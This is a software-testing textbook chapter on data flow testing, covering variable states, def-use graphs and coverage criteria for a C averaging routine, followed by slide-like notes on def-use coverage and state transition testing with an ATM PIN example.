Huang [2] introduced the idea of “states” of program variables to identifydata flow anomaly. For example, initially, a variable can remain in an “undefined”(U ) state, meaning that just a memory location has been allocated to the variablebut no value has yet been assigned. At a later time, the programmer can performa computation to define (d ) the variable in the form of assigning a value to thevariable—this is when the variable moves to a “defined but not referenced” (D)state. At a later time, the programmer can reference (r), that is, read, the value ofthe variable, thereby moving the variable to a “defined and referenced” state (R).The variable remains in the R state as long as the programmer keeps referencingthe value of the variable. If the programmer assigns a new value to the variable, thevariable moves back to the D state. On the other hand, the programmer can takean action to undefine (u) the variable. For example, if an opened file is closed, thevalue of the file pointer is no more recognized by the underlying operating system,and therefore the file pointer becomes undefined. The above scenarios describe thenormal actions on variables and are illustrated in Figure 5.2.

However, programmers can make mistakes by taking the wrong actions whilea variable is in a certain state. For example, if a variable is in the state U —that is,the variable is still undefined—and a programmer reads (r) the variable, then thevariable moves to an abnormal (A) state. The abnormal state of a variable meansthat a programming anomaly has occurred. Similarly, while a variable is in the stateD and the programmer undefines (u) the variable or redefines (d ) the variable, thenthe variable moves to the abnormal (A) state. Once a variable enters the abnormalstate, it remains in that state irrespective of what action—d, u , or r —is taken. Theactions that take a variable from a desired state, such as U or D , to an abnormalstate are illustrated in Figure 5.2.

5.3 OVERVIEW OF DYNAMIC DATA FLOW TESTING 115

Actions

U

States

U: UndefinedD: Defined but not referencedR: Defined and referencedA: Abnormal

d: Definer: Referenceu: Undefine

D R

A

u

d r r

d

u

r

d, u, r

d, u

Legend:

Figure 5.2 State transition diagram of a program variable. (From ref. 2. © 1979 IEEE.)

Now it is useful to make an association between the type 1, type 2, andtype 3 anomalies and the state transition diagram shown in Figure 5.2. The type 1,type 2, and type 3 anomalies are denoted by the action sequences dd , ur , and du ,respectively, in Figure 5.2.

Data flow anomaly can be detected by using the idea of program instrumen-tation . Intuitively, program instrumentation means incorporating additional codein a program to monitor its execution status. For example, we can write addi-tional code in a program to monitor the sequence of states , namely the U , D , R,and A, traversed by a variable. If the state sequence contains the dd , ur , and dusubsequence, then a data flow anomaly is said to have occurred.

The presence of a data flow anomaly in a program does not necessarily meanthat execution of the program will result in a failure. A data flow anomaly simplymeans that the program may fail, and therefore the programmer must investigatethe cause of the anomaly. Let us consider the dd anomaly shown in Figure 5.1.If the real intention of the programmer was to perform the second computationand the first computation produces no side effect, then the first computation merelyrepresents a waste of processing power. Thus, the said dd anomaly will not leadto program failure. On the other hand, if a statement is missing in between the twostatements, then the program can possibly lead to a failure. The programmers mustanalyze the causes of data flow anomalies and eliminate them.

5.3 OVERVIEW OF DYNAMIC DATA FLOW TESTING

In the process of writing code, a programmer manipulates variables in order toachieve the desired computational effect. Variable manipulation occurs in severalways, such as initialization of the variable, assignment of a new value to the


variable, computing a value of another variable using the value of the variable, andcontrolling the flow of program execution.

Rapps and Weyuker [3] convincingly tell us that one should not feel confi-dent that a variable has been assigned the correct value if no test case causes theexecution of a path from the assignment to a point where the value of the variableis used . In the above motivation for data flow testing, (i) assignment of a correctvalue means whether or not a value for the variable has been correctly generatedand (ii) use of a variable refers to further generation of values for the same or othervariables and/or control of flow. A variable can be used in a predicate, that is, acondition, to choose an appropriate flow of control.

The above idea gives us an indication of the involvement of certain kinds ofprogram paths in data flow testing. Data flow testing involves selecting entry–exitpaths with the objective of covering certain data definition and use patterns, com-monly known as data flow testing criteria. Specifically, certain program paths areselected on the basis of data flow testing criteria. Following the general ideas incontrol flow testing that we discussed in Chapter 4, we give an outline of performingdata flow testing in the following:

• Draw a data flow graph from a program.

• Select one or more data flow testing criteria.

• Identify paths in the data flow graph satisfying the selection criteria.

• Derive path predicate expressions from the selected paths and solve thoseexpressions to derive test input.

The reader may recall that the process of deriving a path predicate expression froma path has been explained in Chapter 4. The same idea applies to deriving a pathpredicate expression from a path obtained from a data flow graph. Therefore, inthe rest of this chapter we will explain a procedure for drawing a data flow graphfrom a program unit, and discuss data flow testing criteria.

5.4 DATA FLOW GRAPH

In this section, we explain the main ideas in a data flow graph and a method todraw it. In practice, programmers may not draw data flow graphs by hand. Instead,language translators are modified to produce data flow graphs from program units.A data flow graph is drawn with the objective of identifying data definitions andtheir uses as motivated in the preceding section. Each occurrence of a data variableis classified as follows:

Definition: This occurs when a value is moved into the memory locationof the variable. Referring to the C function VarTypes() in Figure 5.3, theassignment statement i = x; is an example of definition of the variable i .

Undefinition or Kill : This occurs when the value and the location becomeunbound. Referring to the C function VarTypes(), the first

(iptr = malloc(sizeof(int));

5.4 DATA FLOW GRAPH 117

int VarTypes(int x, int y){int i;int *iptr;i = x;iptr = malloc(sizeof(int));*iptr = i + x;if (*iptr > y)

return (x);else {

iptr = malloc(sizeof(int));*iptr = x + y;return(*iptr);}

}

Figure 5.3 Definition and uses of variables.

statement initializes the integer pointer variable iptr and

iptr = i + x;

initializes the value of the location pointed to by iptr. The second

iptr = malloc(sizeof(int));

statement redefines variable iptr, thereby undefining the location previ-ously pointed to by iptr.

Use: This occurs when the value is fetched from the memory location of thevariable. There are two forms of uses of a variable as explained below.

• Computation use (c-use): This directly affects the computation beingperformed. In a c-use, a potentially new value of another variable or ofthe same variable is produced. Referring to the C function VarTypes(),the statement

*iptr = i + x;

gives examples of c-use of variables i and x .

• Predicate use (p-use): This refers to the use of a variable in a predicatecontrolling the flow of execution. Referring to the C function VarTypes(),the statement

if (*iptr > y) ...

gives examples of p-use of variables y and iptr.

A data flow graph is a directed graph constructed as follows:

• A sequence of definitions and c-uses is associated with each node of thegraph.

• A set of p-uses is associated with each edge of the graph.


• The entry node has a definition of each parameter and each nonlocal vari-able which occurs in the subprogram.

• The exit node has an undefinition of each local variable.

Example: We show the data flow graph in Figure 5.4 for the ReturnAverage()example discussed in Chapter 4, The initial node, node 1, represents initializationof the input vector < value, AS, MIN, MAX > . Node 2 represents the initializationof the four local variables i , ti, tv, and sum in the routine. Next we introduce aNULL node, node 3, keeping in mind that control will come back to the beginningof the while loop. Node 3 also denotes the fact that program control exits fromthe while loop at the NULL node. The statement ti++ is represented by node 4.The predicate associated with edge (3, 4) is the condition part of the while loop,namely,

((ti < AS) && (value[i] != -999))

Statements tv++ and sum = sum + value[i] are represented by node 5.Therefore, the condition part of the first if statement forms the predicate associatedwith edge (4, 5), namely,

Initialize: value[], AS, MIN, MAX


i++

((ti < AS) && (value[i] != −999))

i = 0, ti = 0, tv = 0, sum = 0

av = (double)−999 av = (double)sum/tv

ti++

NULL

NULL

return(av)

1

2

3

4

6

7

8 9

10

(value[i] != −999))~((ti < AS) &&

~((value[i] >= MIN) && (value[i] <= MAX))

5

((value[i] >= MIN) && (value[i] <= MAX))

~(tv > 0) (tv > 0)

True

True

True True True

True

Figure 5.4 Data flow graph of ReturnAverage() example.

5.5 DATA FLOW TERMS 119

((value[i] >= MIN) && (value[i] <= MAX))

The statement i++ is represented by node 6. The predicate associated withedge (4, 6) is the negation of the condition part of the if statement, namely,

((value[i] >= MIN) && (value[i] <= MAX)).

The predicate associated with edge (5, 6) is true because there is an uncondi-tional flow of control from node 5 to node 6. Execution of the while loop terminateswhen its condition evaluates to false. Therefore, the predicate associated with edge(3, 7) is the negation of the predicate associated with edge (3, 4), namely,

~((ti < AS) && (value[i] != -999))

It may be noted that there is no computation performed in a NULL node.Referring to the second if statement, av = (double) − 999 is represented by node8, and av = (double) sum/tv is represented by node 9. Therefore, the predicateassociated with edge (7, 9) is

(tv > 0),

and the predicate associated with edge (7, 8) is

~(tv > 0).

Finally, the return(av) statement is represented by node 10, and the predicateTrue is associated with both the edges (7, 8) and (7, 9).

5.5 DATA FLOW TERMS

A variable defined in a statement is used in another statement which may occurimmediately or several statements after the definition. We are interested in findingpaths that include pairs of definition and use of variables. In this section, we explaina family of path selection criteria that allow us to select paths with varying strength.The reader may note that for every feasible path we can generate a test case. Inthe following, first we explain a few terms, and then we explain a few selectioncriteria using those terms.

Global c-use: A c-use of a variable x in node i is said to be a global c-useif x has been defined before in a node other than node i .

Example: The c-use of variable tv in node 9 is a global c-use since tvhas been defined in nodes 2 and 5 (Figure 5.4).

Definition Clear Path: A path (i − n1 − · · ·− nm − j ), m ≥ 0, is called a def-inition clear path (def-clear path) with respect to variable x

• from node i to node j and

• from node i to edge (nm , j )


if x has been neither defined nor undefined in nodes n1, . . . ,nm . The readermay note that the definition of a def-clear path is unconcerned about thestatus of x in nodes i and j . Also, a def-clear path does not precludeloops. Therefore, the path 2-3-4-6-3-4-6-3-4-5, which includes a loop, isa def-clear path.

Example: The paths 2-3-4-5 and 2-3-4-6 are def-clear paths with respectto variable tv from node 2 to 5 and from node 2 to 6, respectively(Figure 5.4).

Global Definition: A node i has a global definition of a variable x if node ihas a definition of x and there is a def-clear path with respect to x fromnode i to some

• node containing a global c-use or

• edge containing a p-use of

variable x . The reader may note that we do not define global p-use of avariable similar to global c-use. This is because every p-use is associatedwith an edge—and not a node.

In Table 5.1, we show all the global definitions and global c-usesappearing in the data flow graph of Figure 5.4; def(i) denotes the setof variables which have global definitions in node i . Similarly, c-use(i)denotes the set of variables which have global c-uses in node i . We showall the predicates and p-uses appearing in the data flow graph of Figure 5.4in Table 5.2; predicate(i,j) denotes the predicate associated with edge (i, j)of the data flow graph in Figure 5.4; p-use(i, j) denotes the set of variableswhich have p-uses on edge (i, j).

Simple Path: A simple path is a path in which all nodes, except possibly thefirst and the last, are distinct.

TABLE 5.1 Def() and c-use() Sets of Nodes in Figure 5.4

Nodes i def(i) c-use(i)

1 {value, AS, MIN, MAX} {}2 {i, ti, tv, sum} {}3 {} {}4 {ti} {ti}5 {tv, sum} {tv, i, sum, value}6 {i} {i}7 {} {}8 {av} {}9 {av} {sum, tv}

10 {} {av}

5.6 DATA FLOW TESTING CRITERIA 121

TABLE 5.2 Predicates and p-use() Set of Edges in Figure 5.4

Edges (i, j) predicate(i, j) p-use(i, j)

(1, 2) True {}(2, 3) True {}(3, 4) (ti < AS) && (value[i] ! = − 999) {i, ti, AS, value}(4, 5) (value[i] < = MIN) && (value[i] > = MAX) {i, MIN, MAX, value}(4, 6) ∼((value[i] < = MIN) && (value[i] > = MAX)) {i, MIN, MAX, value}(5, 6) True {}(6, 3) True {}(3, 7) ∼((ti < AS) && (value[i] ! = − 999)) {i, ti, AS, value}(7, 8) ∼(tv > 0) {tv}(7, 9) (tv > 0) {tv}(8, 10) True {}(9, 10) True {}

Example: Paths 2-3-4-5 and 3-4-6-3 are simple paths (Figure 5.4).

Loop-Free Path: A loop-free path is a path in which all nodes are distinct.

Complete Path: A complete path is a path from the entry node to the exitnode.

Du-path: A path (n1 − n2 − · · ·− nj − nk ) is a definition-use path (du-path)with respect to (w.r.t) variable x if node n1 has a global definition of xand either• node nk has a global c-use of x and (n1 − n2 − · · ·− nj − nk ) is a

def-clear simple path w.r.t. x or• edge (nj ,nk ) has a p-use of x and (n1 − n2 − · · ·− nj ) is a def-clear,

loop-free path w.r.t. x .

Example: Considering the global definition and global c-use of variable tv innodes 2 and 5, respectively, 2-3-4-5 is a du-path.

Example: Considering the global definition and p-use of variable tv in nodes 2and on edge (7, 9), respectively, 2-3-7-9 is a du-path.

5.6 DATA FLOW TESTING CRITERIA

In this section, we explain seven types of data flow testing criteria. These criteriaare based on two fundamental concepts, namely, definitions and uses—both c-usesand p-uses—of variables.

All-defs : For each variable x and for each node i such that x has a globaldefinition in node i , select a complete path which includes a def-clear pathfrom node i to


• node j having a global c-use of x or• edge (j ,k ) having a p-use of x .

Example: Consider the variable tv, which has global definitions in nodes 2 and5 (Figure 5.4 and Tables 5.1 and 5.2). First, we consider its global definition innode 2. We find a global c-use of tv in node 5, and there exists a def-clear path2-3-4-5 from node 2 to node 5. We choose a complete path 1-2-3-4-5-6-3-7-9-10that includes the def-clear path 2-3-4-5 to satisfy the all-defs criterion. We alsofind p-uses of variable tv on edge (7, 8), and there exists a def-clear path 2-3-7-8from node 2 to edge (7, 8). We choose a complete path 1-2-3-7-8-10 that includesthe def-clear path 2-3-7-8 to satisfy the all-defs criterion. Now we consider thedefinition of tv in node 5. In node 9 there is a global c-use of tv, and in edges(7, 8) and (7, 9) there are p-uses of tv. There is a def-clear path 5-6-3-7-9 fromnode 5 to node 9. Thus, we choose a complete path 1-2-3-4-5-6-3-7-9-10 thatincludes the def-clear path 5-6-3-7-9 to satisfy the all-defs criterion. The readermay note that the complete path 1-2-3-4-5-6-3-7-9-10 covers the all-defs criterionfor variable tv defined in nodes 2 and 5. To satisfy the all-defs criterion, similarpaths must be obtained for variables i , ti, and sum.

All-c-uses : For each variable x and for each node i , such that x has a globaldefinition in node i , select complete paths which include def-clear pathsfrom node i to all nodes j such that there is a global c-use of x in j .

Example: Let us obtain paths to satisfy the all-c-uses criterion with respect tovariable ti. We find two global definitions of ti in nodes 2 and 4. Correspondingto the global definition in node 2, there is a global c-use of ti in node 4. However,corresponding to the global definition in node 4, there is no global c-use of ti. Fromthe global definition in node 2, there is a def-clear path to the global c-use in node4 in the form of 2-3-4. The reader may note that there are four complete paths thatinclude the def-clear path 2-3-4 as follows:

1-2-3-4-5-6-3-7-8-10,

1-2-3-4-5-6-3-7-9-10,

1-2-3-4-6-3-7-8-10, and

1-2-3-4-6-3-7-9-10.

One may choose one or more paths from among the four paths above tosatisfy the all-c-uses criterion with respect to variable ti.

All-p-uses : For each variable x and for each node i such that x has a globaldefinition in node i , select complete paths which include def-clear pathsfrom node i to all edges (j ,k ) such that there is a p-use of x on edge (j ,k ).

Example: Let us obtain paths to satisfy the all-p-uses criterion with respect tovariable tv. We find two global definitions of tv in nodes 2 and 5. Correspondingto the global definition in node 2, there is a p-use of tv on edges (7, 8) and (7, 9).There are def-clear paths from node 2 to edges (7, 8) and (7, 9), namely 2-3-7-8and 2-3-7-9, respectively. Also, there are def-clear paths from node 5 to edges

5.6 DATA FLOW TESTING CRITERIA 123

(7, 8) and (7, 9), namely, 5-6-3-7-8 and 5-6-3-7-9, respectively. In the following,we identify four complete paths that include the above four def-clear paths:

1-2-3-7-8-10,

1-2-3-7-9-10,

1-2-3-4-5-6-3-7-8-10, and

1-2-3-4-5-6-3-7-9-10.

All-p-uses/Some-c-uses : This criterion is identical to the all-p-uses criterionexcept when a variable x has no p-use. If x has no p-use, then this criterionreduces to the some-c-uses criterion explained below.

Some-c-uses: For each variable x and for each node i such that x hasa global definition in node i , select complete paths which includedef-clear paths from node i to some nodes j such that there is aglobal c-use of x in node j .

Example: Let us obtain paths to satisfy the all-p-uses/some-c-uses criterion withrespect to variable i . We find two global definitions of i in nodes 2 and 6. There is nop-use of i in Figure 5.4. Thus, we consider some c-uses of variable i . Correspondingto the global definition of variable i in node 2, there is a global c-use of i in node6, and there is a def-clear path from node 2 to node 6 in the form of 2-3-4-5-6.Therefore, to satisfy the all-p-uses/some-c-uses criterion with respect to variable i ,we select the complete path 1-2-3-4-5-6-3-7-9-10 that includes the def-clear path2-3-4-5-6.

All-c-uses/Some-p-uses : This criterion is identical to the all-c-uses criterionexcept when a variable x has no global c-use. If x has no global c-use,then this criterion reduces to the some-p-uses criterion explained below.

Some-p-uses: For each variable x and for each node i such that x hasa global definition in node i , select complete paths which includedef-clear paths from node i to some edges (j ,k ) such that there is ap-use of x on edge (j ,k ).

Example: Let us obtain paths to satisfy the all-c-uses/some-p-uses criterion withrespect to variable AS. We find just one global definition of AS in node 1. Thereis no global c-use of AS in Figure 5.4. Thus, we consider some p-uses of AS.Corresponding to the global definition of AS in node 1, there are p-uses of ASon edges (3, 7) and (3, 4), and there are def-clear paths from node 1 to thosetwo edges, namely, 1-2-3-7 and 1-2-3-4, respectively. There are many completepaths that include those two def-clear paths. One such example path is given as1-2-3-4-5-6-3-7-9-10.

All-uses : This criterion is the conjunction of the all-p-uses criterion and theall-c-uses criterion discussed above.

All-du-paths : For each variable x and for each node i such that x has a globaldefinition in node i , select complete paths which include all du-paths fromnode i


• to all nodes j such that there is a global c-use of x in j and

• to all edges (j ,k ) such that there is a p-use of x on (j ,k ).

In Chapter 4, we explained a procedure to generate a test input from anentry–exit program path. There is much similarity between the control flow–basedtesting and the data flow–based testing. Their difference lies in the ways the twotechniques select program paths.

5.7 COMPARISON OF DATA FLOW TEST SELECTIONCRITERIA

Having seen a relatively large number of test selection criteria based on the conceptsof data flow and control flow, it is useful to find relationships among them. Givena pair of test selection criteria, we should be able to compare the two. If we cannotcompare them, we realize that they are incomparable. Rapps and Weyuker [3]defined the concept of an includes relationship to find out if, for a given pair ofselection criteria, one includes the other. In the following, by a complete path wemean a path from the entry node of a flow graph to one of its exit nodes.

Definition: Given two test selection criteria c1 and c2, c1 includes c2 if for everydef/use graph any set of complete paths of the graph that satisfies c1 also satisfies c2.

Definition: Given two test selection criteria c1 and c2, c1 strictly includes c2,denoted by c1 → c2, provided c1 includes c2 and for some def/use graph there isa set of complete paths of the graph that satisfies c2 but not c1.

It is easy to note that the “→” relationship is a transitive relation.Moreover, given two criteria c1 and c2, it is possible that neither c1 → c2

nor c2 → c1 holds, in which case we call the two criteria incomparable.Proving the strictly includes relationship or the incomparable relationshipbetween two selection criteria in a programming language with arbitrarysemantics may not be possible. Thus, to show the strictly includes rela-tionship between a pair of selection criteria, Rapps and Weyuker [3] haveconsidered a restricted programming language with the following syntax:

Start statement: startInput statement: read x 1, . . . ,x n , where x i , . . . ,n are

variables.Assignment statement: y←f (x 1, . . . ,x n ), where y , x i , . . . ,n are

variables, and f is a function.Output statement: print e1, . . . ,en , where e1, . . . ,en are output

values.Unconditional transfer statement: goto m , where m is a label.

Conditional transfer statement: if p(x 1, . . . ,x n ), then goto m , where p is apredicate.

Halt statement: stop

5.8 FEASIBLE PATHS AND TEST SELECTION CRITERIA 125

All-uses

All-p-uses/Some-c-uses

All-defs

All-c-uses/Some-p-uses

All-c-uses All-p-uses

All-statements

All-branches

All-paths

All-du-paths

Figure 5.5 Relationship among DF (data flow) testing criteria. (From ref. 4. © 1988IEEE.)

Frankl and Weyuker [4] have further extended the relationship; what theyhave proved has been summarized in Figure 5.5. For example, the all-pathsselection criterion strictly includes the all-du-paths criterion. Similarly, theall-c-uses/some-p-uses criterion strictly includes the all-defs criterion.

However, we cannot find a strictly includes relationship between the pairall-c-uses and all-p-uses. Let P c

x be a set of paths selected by the all-c-uses criterionwith respect to a variable x . Now we cannot say with certainty whether or not thepath set P c

x satisfies the all-p-uses criterion with respect to the same variable x .Similarly, let P

px be a set of paths selected by the all-p-uses criterion with respect

to the variable x . Now we cannot say with certainty whether or not the path setP

px satisfies the all-c-uses criterion with respect to the same variable x . Thus, the

two criteria all-c-uses and all-p-uses are incomparable.Note the relationship between data flow–based test selection criteria and

control flow–based test selection criteria, as shown in Figure 5.5. The two controlflow–based test selection criteria in Figure 5.5 are all-branches and all-statements.The all-p-uses criterion strictly includes the all-branches criterion, which impliesthat one can select more paths from a data flow graph of a program unit than fromits control flow graph.

5.8 FEASIBLE PATHS AND TEST SELECTION CRITERIA

Given a data flow graph, a path is a sequence of nodes and edges. A completepath is a sequence of nodes and edges starting from the initial node of the graph toone of its exit nodes. A complete path is executable if there exists an assignment


of values to input variables and global variables such that all the path predicatesevaluate to true, thereby making the path executable. Executable paths are alsoknown as feasible paths. If no such assignment of values to input variables andglobal variables exists, then we call the path infeasible or inexecutable.

Since we are interested in selecting inputs to execute paths, we must ensurethat a test selection criterion picks executable paths. Assume that we want to testa program by selecting paths to satisfy a certain selection criterion C . Let PC bethe set of paths selected according to criterion C for a given program unit. As anextreme example, if all the paths in PC are infeasible, then the criterion C hasnot helped us in any way. For a criterion C to be useful, it must select a set ofexecutable, or feasible, paths. Frankl and Weyuker [4] have modified the definitionsof the test selection criteria so that each criterion selects only feasible paths. Inother words, we modify the definition of criterion C to obtain a criterion C * whichselects only feasible paths, and C * is called a feasible data flow (FDF) testingcriterion. As an example, the criterion (All-c-uses)* is an adaptation of All-c-usessuch that only feasible paths are selected by (All-c-uses)*, as defined below.

(All-c-uses)* : For each variable x and for each node i , such that x has aglobal definition in node i , select feasible complete paths which includedef-clear paths from node i to all nodes j such that there is a global c-useof x in j .

Thus, test selection criteria (All-paths)*, (All-du-paths)*, (All-uses)*,(All-c-uses/Some-p-uses)*, (All-p-uses/Some-c-uses)*, (All-c-uses)*, (All-p-uses)*, (All-defs)*, (All-branches)*, and (All-statements)* choose only feasiblepaths, and, therefore, these are called feasible data flow (FDF) testing criteria.Frankl and Weyuker [4] have shown that the strictly includes relationships amongtest selection criteria, as shown in Figure 5.5, do not hold if the selection criteriachoose only feasible paths. The new relationship among FDF test selection criteriais summarized in Figure 5.6. Though it is seemingly useful to select only feasiblepaths, and therefore consider only the FDF test selection criteria, we are facedwith the decidability problem. More specifically, it is undecidable to know if agiven set of paths is executable. We cannot automate the application of an FDFtest selection criterion, if we do not know the executability of the path. On theother hand, a data flow testing criterion may turn out to be inadequate if allits selected paths are infeasible, in which case the criterion is considered to beinadequate. Consequently, a test engineer must make a choice between using aninadequate selection criterion and one that cannot be completely automated.

5.9 COMPARISON OF TESTING TECHNIQUES

So far we have discussed two major techniques for generating test data from sourcecode, namely control flow–based path selection and data flow–based path selection.We also explained a few criteria to select paths from a control flow graph and dataflow graph of a program. Programmers often randomly select test data based ontheir own understanding of the code they have written. Therefore, it is natural to

5.9 COMPARISON OF TESTING TECHNIQUES 127

(All-p-uses)*

(All-du-paths)*

(All-uses)*

(All-paths)*

(All-branches)*

(All-statements)*

(All-c-uses/Some-p-uses)* (All-p-uses/Some-c-uses)*

(All-defs)*(All-c-uses)*

Figure 5.6 Relationship among FDF (feasible data flow) testing criteria. (From ref. 4. ©1988 IEEE.)

compare the effectiveness of the three test generation techniques, namely randomtest selection, test selection based on control flow, and test selection based on dataflow. Comparing those techniques does not seem to be an easy task. An acceptable,straightforward way of comparing them is to apply those techniques to the sameset of programs with known faults and express their effectiveness in terms of thefollowing two metrics:

• Number of test cases produced

• percentage of known faults detected

Ntafos [5] has reported on the results of an experiment comparing the effec-tiveness of three test selection techniques. The experiment involved seven math-ematical programs with known faults. For the control flow–based technique, thebranch coverage criterion was selected, whereas the all-uses criterion was cho-sen for data flow testing. Random testing was also applied to the programs. Thedata flow testing, branch testing, and random testing detected 90%, 85.5%, and79.5%, respectively, of the known defects. A total of 84 test cases were designedto achieve all-uses coverage, 34 test cases were designed to achieve branch cover-age, and 100 test cases were designed in the random testing approach. We interpretthe experimental results as follows:

• A programmer can randomly generate a large number of test cases to findmost of the faults. However, one will run out of test cases to find some ofthe remaining faults. Random testing does not look to be ineffective, but


Num

ber

of f

aults

det

ecte

d by

usi

ng a

tech

niqu

e

Control flow– based testing

Data flow– based testing

Total number of faults in a program

Randomtesting

New testing techniques

Reduce this gap

Figure 5.7 Limitation of different fault detection techniques.

it incurs higher costs than the systematic techniques, namely, the controlflow and the data flow techniques.

• Test selection based on branch coverage produces much fewer test casesthan the random technique, but achieves nearly the same level of faultdetection as the random technique. Thus, there is significant saving in thecost of program testing.

• The all-uses testing criterion gives a programmer a new way to designmore test cases and reveal more faults than the branch coverage criterion.

• All these techniques have inherent limitations which prevent them fromrevealing all faults. Therefore, there is a need to use many different testingtechniques and develop new techniques. This idea is depicted in Figure 5.7.Our goal is to reduce the gap between the total number of faults presentin a program and the faults detected by various test generation techniques.

5.10 SUMMARY

Flow of data in a program can be visualized by considering the fact that a programunit accepts input data, transforms the input data through a sequence of compu-tations, and, finally, produces the output data. Therefore, one can imagine datavalues to be flowing from one assignment statement defining a variable to anotherassignment statement or a predicate where the value is used.

Three fundamental actions associated with a variable are undefine (u), define(d ), and reference (r). A variable is implicitly undefined when it is created withoutbeing assigned a value. On the other hand, a variable can be explicitly undefined.For example, when an opened file is closed, the variable holding the file pointerbecomes undefined. We have explained the idea of “states” of a variable, namely,undefined (U ), defined (D), referenced (R), and abnormal (A), by considering thethree fundamental actions on a variable. The A state represents the fact that thevariable has been accessed in an abnormal manner causing data flow anomaly.

LITERATURE REVIEW 129

Individual actions on a variable do not cause data flow anomaly. Instead, certainsequences of actions lead to data flow anomaly, and those three sequences ofactions are dd , ur , and du . A variable continues to remain in the abnormal stateirrespective of subsequent actions once it enters that state. The mere presence ofdata flow anomaly in a program may not lead to program failure. The programmermust investigate the cause of an anomaly and modify the code to eliminate it. Forexample, a missing statement in the code might have caused a dd anomaly, inwhich case the programmer needs to write new code.

The program path is a fundamental concept in testing. One test case can begenerated from one executable path. The number of different paths selected forexecution is a measure of the extent of testing performed. Path selection based onstatement coverage and branch coverage lead to a small number of paths beingchosen for execution. Therefore, there exists a large gap between control flowtesting and exhaustive testing. The concept of data flow testing gives us a way tobridge the gap between control flow testing and exhaustive testing.

The concept of data flow testing gives us new selection criteria forchoosing more program paths to test than what we can choose by using theidea of control flow testing. Specifically, the data flow test selection criteria areall-du-paths, all-defs, all-c-uses, all-p-uses, all-uses, all-c-uses/some-p-uses, andall-p-uses/some-c-uses. To compare two selection criteria, the concept of a strictlyincludes relationship is found to be useful.

Definition and use coverages – C-use, P-use, Def-clear, Def-use

We will now examine some test adequacy criteria based on the flow of “data” in a program. This is in contrast to criteria based on “flow of control” that we have

examined so far. Test adequacy criteria based on the flow of data are useful in improving tests that are adequate with respect to control-flow based criteria. Let us look at an example.

Verify that the following test set covers all def-use pairs of z and reveals the error.

Definitions and uses

A parameter x passed as call-by-value to a function, is considered as a use of, or a reference to, x. A parameter x passed as call-by-reference, serves as a definition and use of x

Definitions and uses: Pointers

Definitions and uses: Arrays

C-use and p-use

c-use

C-uses within a basic block

Data flow graph

A data-flow graph of a program, also known as def-use graph, captures the flow of definitions (also known as defs) across basic blocks in a program. It is similar to a control flow graph of a program in that the nodes, edges, and all paths thorough the control flow graph are preserved in the data flow graph. An example follows.

Example

Given a program, find its basic blocks, compute defs, c-uses and p-uses in each block. Each block becomes a node in the def-use graph (this is similar to the control flow graph). Attach defs, c-use and p-use to each node in the graph. Label each edge with the condition which when true causes the edge to be taken. We use di(x) to refer to the definition of variable x at node i. Similarly, ui(x) refers to the use of variable x at node i.

Def-clear paths

def-use pairs

Def of a variable at line l1 and its use at line l2 constitute a def-use pair. l1 and l2 can be the same. dcu (di(x)) denotes the set of all nodes where di(x)) is live and used. dpu (di(x)) denotes the set of all edges (k, l) such that there is a def-clear path from node i to edge (k, l) and x is used at node k. We say that a def-use pair (di(x), uj(x)) is covered when a def-clear path that includes nodes i to node j is executed. If uj(x)) is a p-use then all edges of the kind (j, k) must also be taken during some executions.

Def-use pairs are items to be covered during testing. However, in some cases, coverage of a def-use pair implies coverage of another def-use pair. Analysis of the data flow graph can reveal a minimal set of def-use pairs whose coverage implies coverage of all def-use pairs.

Data flow based adequacy

C-use coverage

C-use coverage: path traversed

p-use coverage

p-use coverage: paths traversed

All-uses coverage

Infeasible p- and c-uses

Coverage of a c- or a p-use requires a path to be traversed through the program. However, if this path is infeasible, then some c- and p-uses that require this path to be traversed might also be infeasible. Infeasible uses are often difficult to determine without some hint from a test tool.

Infeasible c-use: Example

C-use coverage: It is the fraction of the total number of c-uses that have been covered by the test cases. A c-use is defined as a path through a program from each point where the value of a variable is defined to its computation use, without the variable being modified along the path.

P-use coverage: It is the fraction of the total number of p-uses that have been covered by the test cases. A p-use is a path from each point where the value of a variable is defined to its use in a predicate or decision, without modifications to the variable along the path. Each coverage criterion discussed above captures some important aspect of a program's structure. In general, test coverage is a measure of how well a test covers all the potential fault-sites in a software product under test, where a potintial fault-site is defined very broadly to mean any structurally or functionally described program element whose integrity may require verification and validation via an appropriately disigned test. Thus a potential fault-site could be a statement, a branch, a c-use, etc.

Finite state machines

State transition testing

• State transition testing is used where some aspect of the system can be described in what is called a ‘finite state machine’. This simply means that the system can be in a (finite) number of different states, and the transitions from one state to another are determined by the rules of the ‘machine’. This is the model on which the system and the tests are based.

• Any system where you get a different output for the same input, depending on what has happened before, is a finite state system.

• A finite state system is often shown as a state diagram (see Figure 4.2). • One of the advantages of the state transition technique is that the model can be

as detailed or as abstract as you need it to be. Where a part of the system is more important (that is, requires more testing) a greater depth of detail can be modeled. Where the system is less important (requires less testing), the model can use a single state to signify what would otherwise be a series of different states.

• A state transition model has four basic parts:

• The states that the software may occupy (open/closed or funded/insufficient funds);

• The transitions from one state to another (not all transitions are allowed); • The events that cause a transition (closing a file or withdrawing money); • The actions that result from a transition (an error message or being given

your cash).

Hence we can see that in any given state, one event can cause only one action, but that the same event – from a different state – may cause a different action and a different end state.

For example, if you request to withdraw $100 from a bank ATM, you may be given cash. Later you may make exactly the same request but it may refuse to give you the money because of your insufficient balance. This later refusal is because the state of your bank account has changed from having sufficient funds to cover the withdrawal to having insufficient funds. The transaction that caused your account to change its state was probably the earlier withdrawal. A state diagram can represent a model from the point of view of the system, the account or the customer.

Let us consider another example of a word processor. If a document is open, you are able to close it. If no document is open, then ‘Close’ is not available. After you choose ‘Close’ once, you cannot choose it again for the same document unless you open that document. A document thus has two states: open and closed.

We will look first at test cases that execute valid state transitions. Figure 4.2 below, shows an example of entering a Personal Identity Number (PIN) to a bank account. The states are shown as circles, the transitions as lines with arrows and the events as the text near the transitions. (We have not shown the actions explicitly on this diagram, but they would be a message to the customer saying things such as ‘Please enter your PIN’.)

The state diagram shows seven states but only four possible events (Card inserted, Enter PIN, PIN OK and PIN not OK). We have not specified all of the possible transitions here – there would also be a time-out from ‘wait for PIN’ and from the three tries which would go back to the start state after the time had elapsed and would probably eject the card. There would also be a transition from the ‘eat card’ state back to the start state. We have not specified all the possible events either – there would be a ‘cancel’ option from ‘wait for PIN’ and from the three tries, which would also go back to the start state and eject the card.

In deriving test cases, we may start with a typical scenario.

• First test case here would be the normal situation, where the correct PIN is entered the first time.

• A second test (to visit every state) would be to enter an incorrect PIN each time, so that the system eats the card.

• A third test we can do where the PIN was incorrect the first time but OK the second time, and another test where the PIN was correct on the third try. These tests are probably less important than the first two.

